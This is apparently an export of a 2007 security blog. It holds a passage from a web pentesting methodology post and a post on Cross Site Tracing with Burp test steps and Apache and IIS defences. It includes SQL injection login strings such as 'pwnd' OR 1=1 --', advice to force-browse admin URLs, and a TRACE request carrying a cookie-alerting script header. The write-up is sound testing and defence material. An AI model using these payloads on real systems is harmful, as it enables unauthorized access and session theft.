password policy, how many failed login attempts before lockout, are there audit and logging mechanizes. You have to understand the box to think outside of it.<br /><br /><span style="font-weight: bold;">Fuzzing</span><br />Error messages are your friend. Try using all the tools above to inject data into the application that it is not expecting and see how it reacts. If you have source code then you can see what will work and what will not. Try to forcefully browse to urls that are either outside your role or without even logging in. I have been granted access to all the admin features of many applications just because the developers didn't think that people can guess URLs and did not validate the sessions before performing updates.<br />Look for urls that update data. Try injecting SQL characters link a tick mark into the POST parameters of these and observe how the application reacts. Always try logging in with <span style="color: rgb(255, 0, 0);">pwnd' OR 1=1 --</span> or a variation like <span style="color: rgb(255, 0, 0);">pwnd' OR '1'='1' and rownum=1 --<span style="color: rgb(0, 0, 0);"> .<br />Study how the application is using cookies and sessions. How much data is stored server side vs client side(i.e. browser). Anything sent to the client can be modified before resubmitting it to the server.<br /><br /><br />I hope this in informative to some people. This is what seems to work well for me. Again i would love to hear about what other people use so please feel free to leave comments.<br /><br /><br /></span></span><br /><table><tr><td><br /><script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script><br /></td><td><br /><a href="javascript:location.href='http://slashdot.org/bookmark.pl?url='+encodeURIComponent(location.href)+'&title='+encodeURIComponent(document.title)"> <img src="http://images.slashdot.org/favicon.gif" alt="Slashdot" border="0" height="16" width="16" /></a> <a href="javascript:location.href='http://slashdot.org/bookmark.pl?url='+encodeURIComponent(location.href)+'&title='+encodeURIComponent(document.title)">Slashdot It!</a> <!-- End Slashdot It link --><br /></td></tr><br /></table>Unknownnoreply@blogger.com3tag:blogger.com,1999:blog-2410549130005981530.post-56165772516780664252007-09-22T20:22:00.001-05:002007-10-03T03:07:10.566-05:00Cross Site Tracing<span style="font-weight: bold;">Overview</span><br />When i first discovered XST I thought this seems really bad. TRACE is a method accepted by the web server like GET, POST, etc but TRACE basically echoes back the htttp data that you throw at it. Its usually used for debugging and should not be enabled on your production environment after it has been loaded. Since it echoes back the request, it is highly susceptible to Cross Site Scripting. The Goal here is to collect the users session cookie.<br /><br />The problem is that I cannot think of a way that a user could be mis-lead into executing a XST vulnerability that would be advantagous to the attacker. There are a couple of ways to execute XST... Java sockets, Microsoft.XMLHTTP activeX object, and Flash. The problem with Java sockets is that they will create their own connections separate from the browser and therefore not transmit cookies or sessions. It seems possible with the other two but all three seem to need an existing XSS vulnerability. The only thing that XST gets you is the possibility to steal httpOnly cookies. <a href="http://msdn2.microsoft.com/en-us/library/ms533046.aspx">HttpOnly cookies</a> are not accessible with javascript. To me the real vulnerability would be the XSS and not the XST.<br /><br /><br /><span style="font-weight: bold;">How to test if your server is vulnerable to XST.</span><br />To test if your server is vulnerable I will use <a href="http://portswigger.net/suite/">Burp Suite</a>. Open Burp and choose <span style="font-weight: bold;">repeater</span>. Change the request to something similar to :<br /><span style="color: rgb(255, 0, 0);">TRACE / HTTP/1.0</span><br /><span style="color: rgb(255, 0, 0);">Header1: <script>alert(document.cookie);</script></span><br /><br />The reply should look like this if TRACE is enabled:<br /><br /><span style="color: rgb(255, 0, 0);">HTTP/1.1 200 OK</span><br /><span style="color: rgb(255, 0, 0);">Date: Sun, 23 Sep 2007 02:48:05 GMT</span><br /><span style="color: rgb(255, 0, 0);">Server: Apache/1.3.34 (Ubuntu) mod_perl/1.29</span><br /><span style="color: rgb(255, 0, 0);">Connection: close</span><br /><span style="color: rgb(255, 0, 0);">Content-Type: message/http</span><br /><br /><span style="color: rgb(255, 0, 0);">TRACE / HTTP/1.0</span><br /><span style="color: rgb(255, 0, 0);">Header1: <script>alert(document.cookie);</script></span><br /><br /><br /><br /><br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp1.blogger.com/_acrzuhZS74A/RvXVEqYUXXI/AAAAAAAAApk/HHUMvW007rY/s1600-h/XST_cut.png"><img id="BLOGGER_PHOTO_ID_5113227228021546354" style="margin: 0px auto 10px; display: block; cursor: pointer; text-align: center;" alt="" src="http://bp1.blogger.com/_acrzuhZS74A/RvXVEqYUXXI/AAAAAAAAApk/HHUMvW007rY/s320/XST_cut.png" border="0" /></a><br />If you use <a href="http://www.owasp.org/index.php/Category:OWASP_WebScarab_Project">WebScarab</a> as your proxy then select <span style="font-weight: bold;">Manual Request</span> and perform the same steps.<br /><br /><span style="font-weight: bold;">Defenses<br /></span>Prevention of this vulnerability is really simple. If your using apache then you need to install the <a href="http://httpd.apache.org/docs/1.3/mod/mod_rewrite.html">mod_rewrite engine</a>. Add the following lines to your httpd.conf file.<br /><br /><span style="color: rgb(51, 255, 51);">RewriteEngine On</span><br /><span style="color: rgb(51, 255, 51);">RewriteCond %{REQUEST_METHOD} ^TRACE</span><br /><span style="color: rgb(51, 255, 51);">RewriteRule .* - [F]</span><br /><br />If your using IIS then you need to filter out everything but GET, POST, and HEAD with <a href="http://www.microsoft.com/technet/security/tools/urlscan.mspx">urlScan</a><br /><br /><span style="font-weight: bold;">References </span><br /><a href="http://msdn2.microsoft.com/en-us/library/ms533046.aspx">http://msdn2.microsoft.com/en-us/library/ms533046.aspx</a><br /><a href="http://jeremiahgrossman.blogspot.com/2007/04/xst-lives-bypassing-httponly.html">http://jeremiahgrossman.blogspot.com/2007/04/xst-lives-bypassing-httponly.html</a><br /><a href="http://httpd.apache.org/docs/1.3/mod/mod_rewrite.html">http://httpd.apache.org/docs/1.3/mod/mod_rewrite.html</a><br /><a href="http://www.microsoft.com/technet/security/tools/urlscan.mspx">http://www.microsoft.com/technet/security/tools/urlscan.mspx</a><br /><br /><table><tr><td><br /><script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script><br /></td><td><br /><a href="javascript:location.href='http://slashdot.org/bookmark.pl?url='+encodeURIComponent(location.href)+'&title='+encodeURIComponent(document.title)"> <img src="http://images.slashdot.org/favicon.gif" alt="Slashdot" border="0" height="16" width="16" /></a> <a href="javascript:location.href='http://slashdot.org/bookmark.pl?url='+encodeURIComponent(location.href)+'&title='+encodeURIComponent(document.title)">Slashdot It!</a> <!-- End Slashdot It link --><br /></td></tr><br /></table>Unknownnoreply@blogger.com5